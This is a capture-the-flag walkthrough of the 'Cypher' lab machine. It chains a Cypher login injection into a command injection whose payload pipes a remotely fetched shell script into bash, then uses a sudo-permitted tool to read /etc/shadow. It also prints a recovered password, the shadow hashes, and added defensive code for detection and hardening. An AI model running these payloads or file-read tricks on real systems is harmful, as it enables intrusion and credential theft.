Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.57
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 08:55 CST
Nmap scan report for 10.10.11.57
Host is up (0.070s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_ 256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cypher.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.07 seconds

80

A hosts entry is needed:

10.10.11.57 cypher.htb

ASM-related:

Directory scan

Regular directory scan:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://cypher.htb/

/about (Status: 200) [Size: 4986]
/api (Status: 307) [Size: 0] [--> /api/docs]
/demo (Status: 307) [Size: 0] [--> /login]
/index (Status: 200) [Size: 4562]
/index.html (Status: 200) [Size: 4562]
/login (Status: 200) [Size: 3671]
/testing (Status: 301) [Size: 178] [--> http://cypher.htb/testing/]

testing

Under testing there is a jar file; download it and analyze it locally:

CustomFunction

It is easy to spot a likely command injection:

SQL injection

But a login is required first. Trying SQL injection on the login form, the error message reveals that the backend runs a Cypher query:
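Why the login is injectable, and what the fix looks like, as an added example that is not code from the original write-up or from the application on the box. The query shape, the `user=` login-log format and the sample log lines are all constructed assumptions; no Neo4j driver is needed because the functions only build query text and parameter maps, and the detector only scans strings.

```python
import re

# Constructed query shape; the application's real query is not shown on the page.
LOGIN_QUERY = "MATCH (u:USER)-[:HAS_HASH]->(h:SHA1) WHERE u.name = '{name}' RETURN h.value"
LOGIN_QUERY_PARAM = "MATCH (u:USER)-[:HAS_HASH]->(h:SHA1) WHERE u.name = $name RETURN h.value"


def build_login_query_unsafe(username: str) -> str:
    """Vulnerable pattern: the username is spliced into the Cypher text, so a
    quote in the input closes the string literal and everything after it is
    parsed as query syntax (extra RETURN / UNION / CALL clauses, '//' comments)."""
    return LOGIN_QUERY.format(name=username)


def build_login_query_safe(username: str) -> tuple:
    """Parameterised pattern: the query text is a constant and the value travels
    as a driver parameter ($name), so it can never change the query structure."""
    return LOGIN_QUERY_PARAM, {"name": username}


# Detection heuristic for a login field that carries Cypher syntax instead of a
# name: a quote followed by a Cypher keyword, or a trailing '//' comment.
_CYPHER_INJECTION = re.compile(
    r"""['"]\s*(RETURN|UNION|CALL|YIELD|MATCH|WITH|OR|AND)\b|//\s*$""",
    re.IGNORECASE,
)


def looks_like_cypher_injection(value: str) -> bool:
    return bool(_CYPHER_INJECTION.search(value))


# Constructed login-log lines in an assumed 'user=<name> pass=***' format.
SAMPLE_LOG = [
    "2025-03-05T08:55:01 POST /api/auth user=alice pass=***",
    "2025-03-05T08:55:09 POST /api/auth user=admin' RETURN 1 // pass=***",
    "2025-03-05T08:55:12 POST /api/auth user=bob pass=***",
]


def flag_login_attempts(log_lines):
    """Return (line_no, username) for log lines whose username field looks like
    Cypher injection, so they can be alerted on or rate-limited."""
    hits = []
    for i, line in enumerate(log_lines, 1):
        m = re.search(r"user=(.*?)(?: pass=|$)", line)
        if m and looks_like_cypher_injection(m.group(1)):
            hits.append((i, m.group(1)))
    return hits


if __name__ == "__main__":
    print(build_login_query_unsafe("admin' RETURN 1 //"))
    print(build_login_query_safe("admin' RETURN 1 //"))
    print(flag_login_attempts(SAMPLE_LOG))
```

The parameterised form is the real fix; the regex is only a monitoring aid and will miss obfuscated inputs, so treat it as a signal for alerting rather than as input filtering.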

Command injection

So a Cypher query can be injected to call the custom function that contains the command injection:

admin' return h.value as a UNION CALL custom.getUrlStatusCode(\"example.com;curl 10.10.14.2:7777/shell.sh|bash;#\") YIELD statusCode AS a RETURN a;//
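The defect in the custom function is that the URL is concatenated into a shell command line. Below is an added example, not the jar's own code (which is a Java Neo4j procedure): a Python sketch of the vulnerable pattern next to a hardened version that validates the URL and builds an argv list so no shell ever parses the input. The curl flags and the hostname rule are my assumptions.

```python
import re
from urllib.parse import urlsplit

# RFC 1123-style hostname: labels of 1-63 alnum/hyphen chars, no leading/trailing hyphen.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def unsafe_status_command(url: str) -> str:
    """Vulnerable pattern (constructed to mirror the jar's style): the URL is
    glued into one string that is handed to a shell, so ';', '|', '`' and
    '$(...)' in the input are interpreted as additional commands."""
    return "curl -s -o /dev/null -w %{http_code} " + url


def safe_status_command(url: str) -> list:
    """Hardened pattern: parse and validate the URL, then pass it as a single
    argv element after '--'. With no shell involved, metacharacters are just
    bytes inside one argument and cannot start a second command."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("unsupported scheme")
    if not parts.hostname or not _HOSTNAME.match(parts.hostname):
        raise ValueError("invalid hostname")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    return ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "--", parts.geturl()]


if __name__ == "__main__":
    print(unsafe_status_command("example.com;id"))   # ';id' survives into the shell line
    print(safe_status_command("http://example.com"))
    try:
        safe_status_command("example.com;id")
    except ValueError as e:
        print("rejected:", e)
```

Running the returned list with `subprocess.run(cmd)` (no `shell=True`) keeps the property that the URL is one argument; in the Java original the equivalent is the `ProcessBuilder` / `String[]` form of `exec` rather than a single command string.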

This gives a shell as the neo4j user:

user flag

In the graphasm user's home directory, the world-readable bbot_preset.yml contains a password that is also graphasm's own password, so you can SSH in directly, which makes the next steps easier:

username: neo4j
password: cU4btyib.20xtCMCXkBmerhK

Privilege escalation info

graphasm can run /usr/local/bin/bbot with sudo:

bbot accepts custom YARA rules (among other options) at run time, and the contents of the rules it loads are echoed in its debug output.
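The root cause here is a sudo rule that names a binary but places no restriction on its arguments, so every flag the tool supports (including ones that read and echo files) becomes available as root. The following is an added example, not from the write-up or from the box: a small audit of sudoers user specifications that flags unrestricted arguments, wildcards and NOPASSWD. The sample lines are constructed (the box's real rule is only shown as an image), and the parser covers the common one-line form only.

```python
import re

# Constructed sudoers lines. In sudoers, a command with no argument list may be
# run with ANY arguments; an empty string "" means it may be run with NO arguments.
SAMPLE_SUDOERS = [
    'root    ALL=(ALL:ALL) ALL',
    'graphasm ALL=(ALL) NOPASSWD: /usr/local/bin/bbot',
    'backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/',
    'deploy  ALL=(root) /usr/local/bin/deploy.sh ""',
]

_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def audit_sudoers_line(line: str) -> list:
    """Return a list of findings for one sudoers user specification."""
    m = _RULE.match(line.strip())
    if not m:
        return ["unparsed"]
    findings = []
    tags = m.group("tags").replace(" ", "")
    cmdspec = m.group("cmd").strip()
    if cmdspec == "ALL":
        findings.append("ALL commands")
        if "NOPASSWD:" in tags:
            findings.append("NOPASSWD")
        return findings
    if "NOPASSWD:" in tags:
        findings.append("NOPASSWD")
    parts = cmdspec.split(None, 1)
    argspec = parts[1] if len(parts) > 1 else None
    if argspec is None:
        # The bbot case: the binary is pinned but any flag is accepted.
        findings.append("arguments unrestricted: any flags accepted")
    elif "*" in argspec or "?" in argspec:
        findings.append("wildcard in arguments")
    return findings


def audit_sudoers(lines) -> dict:
    """Map each rule to its findings, keeping only rules with something to fix."""
    return {l: f for l in lines if (f := audit_sudoers_line(l))}


if __name__ == "__main__":
    for rule, findings in audit_sudoers(SAMPLE_SUDOERS).items():
        print(f"{rule!r}: {', '.join(findings)}")
```

The fix for the flagged rule is to pin the exact argument list the user legitimately needs (as in the rsync sample) or, where the tool cannot be constrained that way, to give the user a dedicated wrapper script that hard-codes the arguments and is itself not writable by them.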

Privilege escalation & root flag

So bbot can be made to read arbitrary files:

sudo /usr/local/bin/bbot --custom-yara-rules /root/root.txt -d --dry-run

sudo /usr/local/bin/bbot --custom-yara-rules /etc/shadow -d --dry-run

shadow

root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::
graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::

References